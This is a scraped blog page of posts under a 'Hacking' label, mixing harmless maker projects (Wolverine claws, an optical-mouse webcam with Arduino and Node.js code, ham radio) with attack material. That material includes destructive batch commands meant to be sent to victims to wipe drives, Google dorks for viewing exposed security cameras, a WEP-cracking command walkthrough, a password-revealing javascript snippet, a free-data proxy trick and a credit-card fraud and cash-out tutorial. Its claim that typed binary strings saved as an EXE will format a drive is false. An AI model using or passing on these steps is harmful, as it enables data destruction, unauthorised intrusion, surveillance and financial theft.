Latest Tricks :
Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Electromagnetic Boots

| 0 comments

X-Men: Days of Future Past is making its way to theaters around the world, and [Mr. Furze] has released his second X-Men related hack 

In case you missed it, [Colin Furze] has made three projects to celebrate geekdom and a mastery of fabrication for all the comic book fans out there. He started with the fully functional pneumatic Wolverine Claws, and now he’s tackling Magneto’s powers. The third project isn’t out quite yet, but we can’t wait to see the final installment!

Now the problem with Magneto is his powers are a wee bit too… magical? Without special effects, you can’t really replicate his mutant abilities (please prove us wrong if you can!), so [Colin] decided to do the next best thing. Magnetize himself — well, his shoes.


Not wanting to spend too much money on this project, he needed electromagnets — but where do you get cheap electromagnets? The answer? Microwave ovens. By salvaging the transformers out of microwave ovens, you can easily cut them in half, remove the secondary coils, and bam, you’ve got a bunch of giant electromagnets.



 


 
Continue Reading

Pneumatic Wolverine Claws Are Quite Possibly The Best Thing Ever

| 0 comments




With the new X-Men movie coming out soon, [Colin Furze] decided to make some real working props from the movies — starting with some bloody brilliant fully functional and retractable Wolverine claws.

We’ve seen Wolverine claws before, even electrified Wolverine claws, but never have we seen anyone take them to the level [Colin] has. He didn’t just want realistic Wolverine claws. He didn’t just want claws that could deploy. He wanted realistic claws that could both deploy, and retract — fast! And he wanted them to branch out just like the real deal.

He started brainstorming different ways of doing this. Motors, springs, geared racks, cables, pneumatic cylinders… nothing really fit the bill. Pneumatic power seemed the best option for performance, but the problem is he’d need a 12″ cylinder to sit behind his claws — it’d completely ruin the look — one of his main criteria for the project.


That was when he had a stroke of brilliance. What if he used o-ring seals, and turned the blades into pneumatic projectiles on a guide rail? Using a slew of awesome toys in his workshop including a TIG welder, desktop mill, grinders and more, he fabricated an awesome double-acting piston-less pneumatic cylinder which can blast his triple-bladed claws back and forth at high speeds on demand!
The only downside is he needs to carry a backpack complete with valve banks and an air tank — but as soon as you see the followin
Continue Reading

Hacking Dell Laptop Charger Identification

| 1comments

If you’ve ever had a laptop charger die, you know that they can be expensive to replace. Many laptops require you to use a ‘genuine’ charger, and refuse to boot when a knock off model is used. Genuine chargers communicate with the laptop and give information such as the power, current, and voltage ratings of the device. While this is a good safety measure, ensuring that a compatible charger is used, it also allows the manufacturers to increase the price of their chargers.
[Xuan] built a device that spoofs this identification information for Dell chargers. In the four-part series (1, 2, 3, 4), the details of reverse engineering the communications and building the spoofer are covered.
Dell uses the 1-Wire protocol to communicate with the charger, and [Xuan] sniffed the communication using a MSP430. After reading the data and verifying the CRC, it could be examined to find the fields that specify power, voltage, and current.
Next, a custom PCB was made with two Dell DC jacks and an MSP430. This passes power through the board, but uses the MSP430 to send fake data to the computer. The demo shows off a 90 W adapter pretending to run at 65 W. With this working, you could power the laptop from any supply that can meet the requirements for current and voltage.
Continue Reading

Remote Control Anything With A PS3 Controller

| 0 comments

When looking for a remote control for your next project, you might want to look in your living room. Wii controllers are a hacker’s favorite, but wagging an electronic wand around isn’t the greatest for remote control planes, cars, tanks, and multicopters. What you need for this is dual analog controls, something every playstation since the 90s has included.
[Marcel] created a replacement electronics board for the Sony DualShock 3 controller for just this purpose. With this board, an XBee, and an old controller, it’s easy to add dual analog control and a whole lot of buttons to any project using an XBee receiver.
The replacement board is based on the ATMega328p uC, includes a Lipo charge circuit and power supply, and inputs for the analog sticks and all the button boards inside the DualShock controller.



Continue Reading

Convert Optical Mouse into Arduino Web Camera

| 0 comments

Optical mouse uses a small camera that records surface to calculate movements of the mouse.
In this tutorial I will show you how to display video signal of this camera in your browser.

The mouse I took apart was an old Logitech RX 250 which contains ADNS-5020 optical sensor.
This sensor records 15x15 pixel images in grayscale. It also calculates X-Y movements of the mouse. 




To get the things running you will need:
- arduino
- ethernet shield
- optical mouse with ADNS-5020 sensor
- 10K ohm resistor

Connect everything together

Make sure that pins (NRESET, NCS, DSIO, SCLK) of the sensor don't connect to anything on the mouse board.
If they do, cut the traces. (I removed the main chip and some resistors to achieve the same thing.)




Solder 10K ohm resistor between NRESET and +5V. Then solder wires (approx. 20cm) to pins NCS, DSIO, SCLK, +5V, GND.
This is a scheme that you should end with: 

 


Put Ethernet shield on arduino and connect it to local network.
Then connect mouse sensor to arduino like this:
+5V -------------- Arduino +5V
GND -------------- Arduino GND
NCS -------------- Arduino digital pin 7
SDIO -------------- Arduino digital pin 6
SCLK -------------- Arduino digital pin 5  

Arduino sketch

In the sketch below replace receiverIP value (in my case 192, 168, 1, 102) to IP of your computer.
Then upload the sketch to arduino. 


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#include <SPI.h>
#include <Ethernet.h>
#include <EthernetUdp.h>

byte arduinoMac[] = { 0xDE, 0xAD, 0xBE, 0xEF, 0xFE, 0xED };
IPAddress arduinoIP(192, 168, 1, 177); // desired IP for Arduino
unsigned int arduinoPort = 8888; // port of Arduino

IPAddress receiverIP(192, 168, 1, 102); // IP of udp packets receiver
unsigned int receiverPort = 6000; // port to listen on my PC

EthernetUDP Udp;

int SCLK = 5;
int SDIO = 6;
int NCS = 7;

void setup() {
Serial.begin(9600);
Ethernet.begin(arduinoMac,arduinoIP);
Udp.begin(arduinoPort);

pinMode(SCLK, OUTPUT);
pinMode(SDIO, OUTPUT);
pinMode(NCS, OUTPUT);

mouse_reset();
delay(10);
}

void loop() {
char img[225];
for (int i=0;i<225;i++){
img[i]=readLoc(0x0b);
img[i] &= 0x7F;
img[i]+=1;//if there is 0 value, part of udp package is lost
Serial.print(img[i], DEC);
Serial.print(",");
delay(2);
}
Serial.println();
Udp.beginPacket(receiverIP, receiverPort); //start udp packet
Udp.write(img); //write mouse data to udp packet
Udp.endPacket(); // end packet

delay(500);
}

void mouse_reset(){
// Initiate chip reset
digitalWrite(NCS, LOW);
pushbyte(0x3a);
pushbyte(0x5a);
digitalWrite(NCS, HIGH);
delay(10);
// Set 1000cpi resolution
digitalWrite(NCS, LOW);
pushbyte(0x0d);
pushbyte(0x01);
digitalWrite(NCS, HIGH);
}

unsigned int readLoc(uint8_t addr){
unsigned int ret=0;
digitalWrite(NCS, LOW);
pushbyte(addr);
ret=pullbyte();
digitalWrite(NCS, HIGH);
return(ret);
}

void pushbyte(uint8_t c){
pinMode(SDIO, OUTPUT);
for(unsigned int i=0x80;i;i=i>>1){
digitalWrite(SCLK, LOW);
digitalWrite(SDIO, c & i);
digitalWrite(SCLK, HIGH);
}
}

unsigned int pullbyte(){
unsigned int ret=0;
pinMode(SDIO, INPUT);
for(unsigned int i=0x80; i>0; i>>=1) {
digitalWrite(SCLK, LOW);
ret |= i*digitalRead(SDIO);
digitalWrite(SCLK, HIGH);
}
pinMode(SDIO, OUTPUT);
return(ret);
} 


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 

Open serial window and you should see data flow from mouse:
 

Install Node.js and Socket.IO

To display data in browser we need to have node.js and socket.io installed on computer.
Install node.js from here: nodejs.org then go to windows command prompt and run:
npm install socket.io

Node.js and and website code

In the code below we configure node.js to listen to udp traffic from arduino, send all data to browser with socket.io and setup a basic web server. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

var dgram = require("dgram");
var server = dgram.createSocket("udp4");

var io = require('socket.io').listen(8000); // server listens for socket.io communication at port 8000
io.set('log level', 1); // disables debugging. this is optional. you may remove it if desired.

server.on("message", function (msg, rinfo) { //every time new data arrives do this:
//console.log("server got: " + msg + " from " + rinfo.address + ":" + rinfo.port);
//console.log("server got:" + msg);
io.sockets.emit('message', msg);
});

server.on("listening", function () {
var address = server.address();
console.log("server listening " + address.address + ":" + address.port);
});

server.bind(6000); //listen to udp traffic on port 6000

var http = require("http"),
url = require("url"),
path = require("path"),
fs = require("fs")
port = process.argv[2] || 8888;

http.createServer(function(request, response) {

var uri = url.parse(request.url).pathname
, filename = path.join(process.cwd(), uri);

var contentTypesByExtension = {
'.html': "text/html",
'.css': "text/css",
'.js': "text/javascript"
};

fs.exists(filename, function(exists) {

if(!exists) {
response.writeHead(404, {"Content-Type": "text/plain"});
response.write("404 Not Found\n");
response.end();
return;
}

if (fs.statSync(filename).isDirectory()) filename += '/index.html';

fs.readFile(filename, "binary", function(err, file) {
var headers = {};
var contentType = contentTypesByExtension[path.extname(filename)];
if (contentType) headers["Content-Type"] = contentType;
response.writeHead(200, headers);
response.write(file, "binary");
response.end();
});
});
}).listen(parseInt(port, 10));

console.log("Static file server running at\n => http://localhost:" + port + "/\nCTRL + C to shutdown");
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
Just save the code as: code.js
Now we need to create a website which will convert data from socket.io into 15x15 image.
This is it: 


 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

<html>
<head>
<style>
#wrapper { width:300px; height:300px; }
div div { width:20px; height:20px; float:left; }
</style>
<script type="text/javascript" src="//localhost:8000/socket.io/socket.io.js"></script>
<script>
var socket = io.connect('http://localhost:8000');
socket.on('connect', function () {
socket.on('message', function (msg) {
document.getElementById('wrapper').innerHTML = '';
for (var i = 0; i < 225; i++) {
pixDraw(Math.round((msg[i])*2.4));
}
});
});
function pixDraw(clr) {
var pixDiv = document.createElement('div');
pixDiv.style.backgroundColor = "rgb("+clr+","+clr+","+clr+")";
document.getElementById("wrapper").appendChild(pixDiv);
}
</script>
</head>
<body>
<div id="wrapper"></div>
</body>
</html>
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Save it as index.html

Run it!

If you are on windows then just download zip file below and run the runme.bat file.
If you are on linux then run the command node code.js in the shell.

Now open the address http://localhost:8888/ in a web browser and you should see a realtime image from mouse:
 

Continue Reading

Airtel latest working free 3g internet trick

| 0 comments

1. Airtel Free GPRS trick With Default Browser :

  • Proxy:- 72.29.76.194
  • Port:- 80
  • Apn:- airtelgprs.com
  • Homepage:-
  • http://ic.bsbportal.com /~hopeupc/alwan.pl /3G/http/google.com

Now save the settings, and run default browser free and download any site. Disconnect after 60 Mb.



2. Airtel Free GPRS january 2014 working both in pc and Mobile


  • 1. Proxy: youtub efreeproxy.com
  • Port: 80
  • 2. Proxy: zendproxy.com
  • Port: 80
  • 3. Proxy: 95.211.209.163
  • Port: 80
  • 4. Proxy: 85.17.141.35
  • Port: 80
  • 5. Proxy: freevideoproxy.com
  • Port: 80
Continue Reading

Automatic Bluetooth Module Programmer

| 0 comments



Before we dive in don’t be confused by the title. This doesn’t flash firmware to the device. But it does automate the process of setting up the Bluetooth to serial module for use in your projects.
We’re often confused by the lack of a standard way of describing these inexpensive modules. We would look at this can call it an HC-05, but we’re not sure if that’s right or not. [James Daniel] calls it a JY-MCU board. If you have a handle on the differences (or lack of) please let us know in the comments. Either way we know that these boards can be frustrating to work with. They can be found with a wide variety of different firmwares, which can make the configuration process a bit different for each.

[James'] solution connects the device to an Arduino running a sketch that he wrote. Connect the device, launch the terminal monitor in the Arduino IDE, then give it your desired settings. The sketch will poll the Bluetooth module to see what speed it is set to run at. It will then establish which firmware version the board is running, displaying this info in the terminal. It then uses that information to program the board with your desired settings.
In this case [James] is using one of the modules to drive his 3D printer without being tethered to his laptop.


http://www.youtube.com/watch?v=WtPqC1PASQY
Continue Reading

Hacking a Ham Radio

| 0 comments



For Christmas, [Lior] received a Baofeng UV5R radio. He didn’t have an amateur radio license, so he decided to use it as a police scanner. Since the schematics were available, he cracked it open and hacked it.

This $40 radio communicates on the 136-174 MHz and 400-480 MHz bands. It uses a one-time programmable microcontroller and the RDA1846 transceiver. With the power traces to the MCU cut, [Lior] was able to send his own signals to the chip over I2C using an Arduino. He also recorded the signals sent by the stock microcontroller during startup, so that he could emulate it with the Arduino.

Once communication was working on an Arduino, [Lior] decided to get rid of the stock microcontroller. He desoldered the chip, leaving exposed pads to solder wires to. Hooking these up to the Arduino gave him a programmable way to control the device. He got his radio license and implemented transmission of Morse Code, and an Arduino sketch is available in the write up.

[Lior] points out that his next step is to make a PCB to connect a different microcontroller to the device. This will give him a $40 radio that is fully programmable. After the break, check out a video of the hacked radio in action.
Continue Reading

Retrotechtacular: Fundamentals of AM and FM Radio Communication

| 17comments



How radios send and receive information can seem magical to the uninformed. For some people, this week’s Retrotechtacular video, “Frequency Modulation – Part 1 Basic Principles”, from the US Army Department of Defense 1964 will be a great refresher, and for others it will be their first introduction into the wonderful world of radio communications.

The stated objective is to teach why FM radio communication reduces interference which normally afflicts AM radio communications. Fundamentals of AM and FM is a better description, however, because the first part of the video nicely teaches the principles of AM and FM radio communications. It isn’t until later in the clip that it delves into interference, advantages of FM modulation, and detailed functioning of FM radio. The delivery is slow at times and admittedly long, yet the pace is perfect for a young ham to follow along with plenty of time to soak in the knowledge. If you’re still on the fence about becoming a ham here’s some words or encouragement.
Though the video isn’t aimed at ham radio users it does address core knowledge needed by amateur radio hobbyists. Amateur radio is full of many exciting communication technologies and you should have a clear understanding of AM and FM communication methodologies before getting on Grandpa’s information super highway. Once you have your ham license (aka ticket) you have privileges to create and test amazing ham related hacks, like [Lior] implementing full programmable control of a Baofeng UV5R ham radio using an Arduino.


Continue Reading

Guest Rant: Ham Radio — Hackers’ Paradise

| 0 comments






The suits at Hacking Crush reached out to SolderSmoke HQ and asked me to send in a few words about why their readers should take a fresh look at ham radio. Here goes:

First, realize that today’s ham radio represents a tremendous opportunity for technical exploration and adventure. How about building a station (and software) that will allow you to communicate by bouncing digital signals off the moon? How about developing a new modulation scheme to send packets not down the fiber optic network, but around the world via the ionosphere, or via ham radio’s fleet of satellites? How about bouncing your packets off the trails left by meteors? This is not your grandfather’s ham radio.
You can meet some amazing people in this hobby: Using a very hacked-together radio station (my antenna was made from scrap lumber and copper refrigerator tubing) I’ve spoken to astronaut hams on space stations. Our “low power, slow signal” group includes a ham named Joe Taylor. Joe is a radio astronomer who won the Nobel Prize for Physics. He’s now putting his software skills to use in the development of below-the-noise receiving systems for ham radio. Join me after the break for more on the topic.
When you start looking into amateur radio, don’t be deterred if the first hams you meet don’t seem to be as deeply into technology as you are. You have to seek out ham radio’s hard-core technical subculture. It is here that hackers will find kindred spirits. As in the hacker world, there is a kind of informal hierarchy based on technical ability and achievement. The FCC licenses have become so easy to get that they no longer count for much. But if you’ve built from scratch an entire shortwave radio station and use it to shoot the breeze with friends in Australia, well, that will win you amateur radio street cred, as will the computer skills that you’ll bring to the hobby from the hacker world.

Hackers will probably be pleasantly surprised by ham radio’s very strong tradition of mutual support and solidarity. Newcomers are welcome and more experienced hams volunteer to serve as mentors. Especially among people who build their own gear, we have a strong “my junk-box is your junk-box” spirit.
There is also a wonderful social aspect to the hobby. I have in my “shack” a shortwave radio station that I hacked myself from junk-box parts. I routinely fire it up and “calling CQ” look for someone out there to talk to. The response could come from down the street or from the other side of the world. What do we talk about? Well, the conversation usually begins with me talking about my amazing “homebrew rig” and goes on from there. At the risk of reinforcing a stereotype, I’ll note that many of us got into ham radio as teenagers in part because we were a bit socially awkward. I suspect that this is something that many hackers can identify with. You can make a lot of good friends in ham radio.
Continue Reading

Format Your HardDisk using Notepad.

| 0 comments

/* ======== EDUCATION PURPOSE ONLY==============*/
 
If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.
Step 1. Copy The Following In Notepad Exactly as it says
01001011000111110010010101010101010000011111100000
Step 2. Save As An EXE Any Name Will Do
Step 3. Send the EXE to People And Infect+

format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000
 
format d:\ /Q/X — this will format your drive d:\
IMPORTANT : This Trick is for Educational Purpose only.DONT TRY ON YOUR OWN PC.wwwdesk.in not responsible for it. TRY WITH YOUR OWN RISK.It lead to loss of data and crashing your computer..!!
01100110011011110111001001101101011000010111010000
100000011001000011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001
 
Try to figure out yourself rest  can’t spoonfeed Its working.
 
Do not try it on your PC. Don’t mess around this is for educational purpose only
 
still if you cant figure it out try this:
  1. go to notepad and type the following:
    @Echo off
  2. Del C:\ *.*|y  save it as Dell.bat
want worse then type the following:
 
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
 
and save it as a .bat file
Continue Reading

How to Convert FAT partiton to NTFS Partition without loosing data

| 0 comments

  • NTFS(NT File System) is the standard file sytem for Microsoft’s Windows XP and Windows Vista operating systems.NTFS file system provides more stability, security and less fragmentation than previous FAT(File Allocation Table) file system used in operating systems like MS-DOS,Windows 98,Windows ME etc.
  • NTFS is the recommended file system for Windows XP and Windows Vista operating systems because it’s is more powerful than FAT or FAT32 file systems used in former Windows OS’s, and includes features required for hosting Active Directory as well as other important security features.Windows Vista needed NTFS file system in order to install and we can’t install Windows Vista on a FAT partition.
  • Converting a partition from FAT or FAT32 to NTFS can be done by an inbuilt utility(convert.exe) in the Windows XP operating system.So if you want increased security and faster data encryption,go ahead and convert to NTFS.
1.Click Start, point to Programs, point to Accessories, and then click Command Prompt.
2.In the command prompt window, type: convert drive_letter: /fs:ntfs
3.After doing this the inbuilt utility, convert.exe will attempt to convert the drive for you.
For example,running the command convert E: /fs:ntfs would format drive E: to the NTFS format.You can convert FAT or FAT32 volumes to NTFS with this command.

*This is a one-way conversion.Once you convert a drive or partition to NTFS, you cannot simply convert it back to FAT or FAT32. You will need to reformat the drive or partition which will erase all data, including programs and personal files, on the partition.
*Make sure there is minimum 3% free space on hard disk drive partitions for proper conversion.

*Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command.
Continue Reading

Facebook Chating in Terminal (linux)

| 2comments

1st Step : 

Open terminal and type 
"  sudo apt-get install finch  "


2nd Step : 

Go to Home directory
and right click in it  >  Create Document > Empty Document > rename it to 
" .gntrc "


3rd Step :

Open " .gntrc "  and paste this line

[general]
mouse = 1

And then save it.


4th Step :

Open Terminal and type " Finch "
Now Add your Facebook Account through " XMPP "
 
User Name : username
Password : password
Domain Name : chat.facebook.com

Save.

You are done! :)
Continue Reading

HOW TO HACK SECURITY CAMERA USING GOOGLE DORK

| 14comments

NOW LETS START THE TUTORIAL
1) YOU NEED TO HIDE YOUR IP (FOR SAFETY) .IF YOU DIDNT SAFE ALSO CAN :D
2) COPY ANY OF THE DORK BELOW AND PASTE IN GOOGLE SEARCH .

3) DONT COPY THE (*)

* inurl:”CgiStart?page=”
* inurl:/view.shtml
* intitle:”Live View / – AXIS
* inurl:view/view.shtml
* inurl:ViewerFrame?Mode=
* inurl:ViewerFrame?Mode=Refresh
* inurl:axis-cgi/jpg
* inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
* inurl:view/indexFrame.shtml
* inurl:view/index.shtml
* inurl:view/view.shtml
* liveapplet
* intitle:”live view” intitle:axis
* intitle:liveapplet
* allintitle:”Network Camera NetworkCamera” (disconnected)
* intitle:axis intitle:”video server”
* intitle:liveapplet inurl:LvAppl
* intitle:”EvoCam” inurl:”webcam.html”
* intitle:”Live NetSnap Cam-Server feed”
* intitle:”Live View / – AXIS”
* intitle:”Live View / – AXIS 206M”
* intitle:”Live View / – AXIS 206W”
 * intitle:”Live View / – AXIS 210?
* inurl:indexFrame.shtml Axis
* inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
* intitle:start inurl:cgistart * intitle:”WJ-NT104 Main Page”
* intitle:snc-z20 inurl:home/
* intitle:snc-cs3 inurl:home/
* intitle:snc-rz30 inurl:home/
* intitle:”sony network camera snc-p1?
* intitle:”sony network camera snc-m1?
* site:.viewnetcam.com -www.viewnetcam.com
* intitle:”Toshiba Network Camera” user login
* intitle:”netcam live image” (disconnected)
 * intitle:”i-Catcher Console – Web Monitor”

Continue Reading

Hack WEP in 5 mins in Backtrack

| 3comments

Open shell console and type in:
Airmon-ng start wlan0
it will say that monitor mode has started on mon0 or mon1 or mon whatever. then type clear to clear that data.
Airodump-ng mon0 (or whatever monitoring mode started on)
it will give you a list of wireless routers that are in range of your computer. pick the one with the most data currently going on for fastest results.
airodump-ng -w (filename u want to use) -c (channel the router is on) --bssid (the bssid) mon0
Then it will start packet inj, then you quickly open a new shell console.
aireplay-ng -1 0 -a (the bssid) mon0
new shell console
aireplay-ng -0 5 -a (the bssid) mon0
new shell console 
aireplay-ng -3 -b (the bssid) mon0
at this point your data per second should be around 100-500 per second and then just wait until the data reaches 40,000
when it does you can hold control and hit C on all the shell consoles to stop the commands.
Open a new shell console or use one already up and type in dir. this will show you the name of the file (the -w (filename)) in case you have forgotten what you named it. It will be a .cap file
Then type aircrack-ng (file name)
For example: aircrack-ng bobsrouter-01.cap
aircrack will say key found! and then you just copy the info down.
Continue Reading

CROSS SITE SCRIPTING

| 0 comments

Cross site scripting attacks are now mostly referred to as XSS attacks. A lot of websites have been found with XSS vulnerabilities including yahoo, YouTube and even some other popular websites. XSS attacks are implemented when a website has XSS vulnerabilities.
It took me months to decipher what this attack is really about. Even when I was reading books on it, I felt I was seeing Latin. Anyway now I’ve understood a whole lot about XSS attacks and how they work. It is very simple and interesting and I believe you won’t just get what I will give you here in handy anywhere.
What is XSS attack?
This attack is also known as code injection and from that we can infer that XSS attack is the exploitation of web servers by inserting codes into the web pages. It was formerly called CSS as an acronym for cross site scripting but I think because of the existence of CSS as cascading style sheet, it was changed to XSS where the “X” represents a cross. Most times, people use the search pane to do this. In an XSS vulnerable website, when a code like <script>alert(‘you are vulnerable to XSS’);</script> is inserted, a dialog box appears showing “you are vulnerable to XSS”. If this can be done, then you can implement all other XSS exploitations on that website.
Few years back, the prestigious yahoo website was vulnerable to this attack. Then we hackers will simply inject the java script below into the address bar:
javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;
%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)
%20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)
%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)
%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if
%20(s)%20alert(%22Passwords%20in%20forms%20on%20this
%20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are
%20no%20passwords%20in%20forms%20on%20this
%20page.%22);})();
This was used to find password behind asterisks of anyone who has used his/her email account on that browser in that computer.
A scenario of how it works: Jeffrey uses his PC to check his yahoo account and then logs out. Simply because Jeffrey had checked the “remember me” check button on the yahoo password authentication page, it shows his email and his password in asterisks or big black dots. Once the jscript above is inserted in the address bar, Jeffrey’s password will display to me in a dialog box. This was used for a long time before yahoo fixed this error. However, you may still find a tutorial on how to hack yahoo accounts with this strategy but here I am telling you that it is stale and it can’t work anymore.
I don’t know much about how it happened with YouTube but I know I’ve heard severally about XSS vulnerabilities found in YouTube.
There is a lot more you can do with XSS which I will explain in latter posts so I will just list some other ways you can implement a cross site scripting attack.
·         It can be used to make cookie grabbers- with cross site scripting, you can pretend to be a website and steal cookies from some internet users.
·         It can be used to deface web pages
·         It can be used for phishing
To find XSS vulnerability in a website, you can use vulnerability scanners like acunetix, jsky, and there are so many others. You can even write your own program to find these vulnerabilities.
Continue Reading

HOW TO HACK A CREDIT CARD

| 0 comments

LETS START


THIS TUTORIAL IS DIVIDED IN TWO PARTS.
INTRODUCTION INTO CREDIT CARDS
CREDIT CARD HACKING

NOTE: HACKING CREDIT CARDS IS AN ILLEGAL ACT, THIS IS ONLY INFORMATIONAL POST AND WE NOT RESPONSIBLE FOR ANY ACTIONS DONE BY YOU AFTER READING THIS TUTORIAL. THIS POST IS FOR EDUCATIONAL PURPOSES ONLY.

LETS START WITH SOME EASY TERMS.

WHAT IS CREDIT CARD ?

CREDIT CARDS ARE OF TWO TYPES:
DEBIT CARD
CREDIT CARD
1. DEBIT MEANS U HAVE A SUM OF AMOUNT IN IT AND U CAN USE THEM.
2. CREDIT MEANS U HAVE A CREDIT LINE LIMIT LIKE OF $10000 AND U CAN USE THEM AND BY THE END OF MONTH PAY IT TO BANK.

TO USE A CREDIT CARD ON INTERNET U JUST NOT NEED CC NUMBER AND EXPIRY BUT U NEED MANY INFO LIKE :
FIRST NAME
LAST NAME
ADDRESS
CITY
STATE
ZIP
COUNTRY
PHONE
CC NUMBER
EXPIRY
CVV2 ( THIS IS 3DIGIT SECURITY CODE ON BACKSIDE AFTER SIGNATURE PANEL )
IF YOU GET THAT INFO YOU CAN USE THAT TO BUY ANY THING ON INTERNET, LIKE SOFTWARE LICENSE, PORN SITE MEMBERSHIP, PROXY MEMBERSHIP, OR ANY THING (ONLINE SERVICES USUALLY, LIKE WEBHOSTING, DOMAINS).

IF U WANT TO MAKE MONEY $ THROUGH HACKING THEN YOU NEED TO BE VERY LUCKY... YOU NEED TO HAVE A EXACT BANK AND BIN TO CASH THAT CREDIT CARD THROUGH ATM MACHINES.

LET ME EXPLAIN HOW ?

FIRST STUDY SOME SIMPLE TERMS.

BINS = FIRST 6 DIGIT OF EVERY CREDIT CARD IS CALLED " BIN " (FOR EXAMPLE CC NUMBER IS : 4121638430101157 THEN ITS BIN IS " 412163 "), I HOPE THIS IS EASY TO UNDERSTAND.

NOW THE QUESTION IS HOW TO MAKE MONEY THROUGH CREDIT CARDS. ITS STRANGE..., WELL YOU CANT DO THAT, BUT THERE IS SPECIFIC PERSONS IN WORLD WHO CAN DO THAT. THEY CALL THEM SELVES " CASHIERS ". YOU CAN TAKE SOME TIME TO FIND A RELIABLE CASHIERS.

NOW THE QUESTION IS EVERY BANK CREDIT CARDS ARE CASHABLE AND EVERY BIN IS CASHABLE? LIKE CITIBANK, BANK OF AMERICA , MBNA .. ARE ALL BANKS ARE CASHABLES ? WELL ANSWER IS " NO ". IF U KNOW SOME THING, A LITTLE THING ABOUT BANKING SYSTEM, HAVE U EVER HEARD WHAT IS ATM MACHINES? WHERE U WITHDRAW UR CASH BY PUTTING UR CARD IN.
EVERY BANK DON'T HAVE ATM, EVERY BANK DON'T SUPPORT ATM MACHINES CASHOUT. ONLY FEW BANKS SUPPORT WITH THEIR FEW BINS (AS U KNOW BIN IS FIRST 6 DIGIT OF ANY CREDIT / DEBIT CARD NUMBER), FOR SUPPOSE BANK OF AMERICA. THAT BANK NOT HAVE ONLY 1 BIN, THAT BANK IS ASSIGNED LIKE, 412345 412370 ARE UR BINS U CAN MAKE CREDIT CARDS ON THEM. SO BANK DIVIDE THE COUNTRY CITI LOCATION WISE, LIKE FROM 412345 - 412360 IS FOR AMERICANS, AFTER THAT FOR OUTSIDERS AND LIKE THIS. I HOPE U UNDERSTAND. SO ALL BINS OF THE SAME BANK ARE EVEN NOT CASHABLE, LIKE FOR SUPPOSE THEY SUPPORT ATM IN NEW YORK AND NOT IN CALIFORNIA, SO LIKE THE BINS OF CALIFORNIA OF SAME BANK WILL BE UNCASHABLE. SO ALWAYS MAKE SURE THAT THE BINS AND BANKS ARE 100% CASHABLE IN MARKET BY MANY CASHIERS.

BE SURE CASHIERS ARE LEGIT, BECAUSE MANY CASHIERS R THERE WHICH TAKE YOUR CREDIT CARD AND RIP U OFF AND DON'T SEND YOUR 50% SHARE BACK.
YOU CAN ALSO FIND SOME CASHIERS ON MIRC *( /SERVER IRC.UNIXIRC.NET:6667 ) CHANNEL : #CASHOUT, #CCPOWER

WELL, CHECK THE WEBSITE WHERE U HAVE LIST OF BINS AND BANKS MOSTLY 101% CASHABLE. IF U GET THE CREDIT CARD OF THE SAME BANK WITH SAME BIN, THEN U CAN CASHOUT OTHERWISE NOT . REMEMBER FOR USING CREDIT CARD ON INTERNET U DON'T NEED PIN ( 4 WORDS PASSWORD WHICH U ENTER IN ATM MACHINE ), BUT FOR CASHOUT U NEED. YOU CAN GET PINS ONLY BY 2ND METHOD OF HACKING WHICH I STILL NOT POST BUT I WILL. FIRST METHOD OF SQL INJECTION AND SHOPADMIN HACKING DON'T PROVIDE WITH PINS, IT ONLY GIVE CC NUMB CVV2 AND OTHER INFO WHICH USUALLY NEED FOR SHOPPING NOT FOR CASHING.

CREDIT CARD HACKING

CC (CREDIT CARDS) CAN BE HACKED BY TWO WAYS:
CREDIT CARD SCAMS ( USUALLY USED FOR EARNING MONEY , SOME TIMES FOR SHOPPING )
CREDIT CARD SHOPADMIN HACKING ( JUST FOR FUN, KNOWLEDGE, SHOPPING ON INTERNET )
1. SHOPADMIN HACKING

THIS METHOD IS USED FOR TESTING THE KNOWLEDGE OR FOR GETTING THE CREDIT CARD FOR SHOPPING ON INTERNET, OR FOR FUN, OR ANY WAY BUT NOT FOR CASHING ( BECAUSE THIS METHOD DON'T GIVE PIN - 4 DIGIT PASSCODE ) ONLY GIVES CC NUMB , CVV2 AND OTHER BASIC INFO.

SHOPADMINS ARE OF DIFFERENT COMPANIES, LIKE: VP-ASP , X CART, ETC. THIS TUTORIAL IS FOR HACKING VP-ASP SHOP.

I HOPE U SEEN WHENEVER U TRY TO BUY SOME THING ON INTERNET WITH CC, THEY SHOW U A WELL PROGRAMMED FORM, VERY SECURE. THEY ARE CARTS, LIKE VP-ASP XCARTS. SPECIFIC SITES ARE NOT HACKED, BUT CARTS ARE HACKED.

BELOW I'M POSTING TUTORIAL TO HACK VP ASP CART. NOW EVERY SITE WHICH USE THAT CART CAN BE HACKED, AND THROUGH THEIR *MDB FILE U CAN GET THEIR CLIENTS 'CREDIT CARD DETAILS', AND ALSO LOGIN NAME AND PASSWORD OF THEIR ADMIN AREA, AND ALL OTHER INFO OF CLIENTS AND COMAPNY SECRETS.

LETS START:

TYPE: VP-ASP SHOPPING CART
VERSION: 5.00

HOW TO FIND VP-ASP 5.00 SITES?

FINDING VP-ASP 5.00 SITES IS SO SIMPLE...

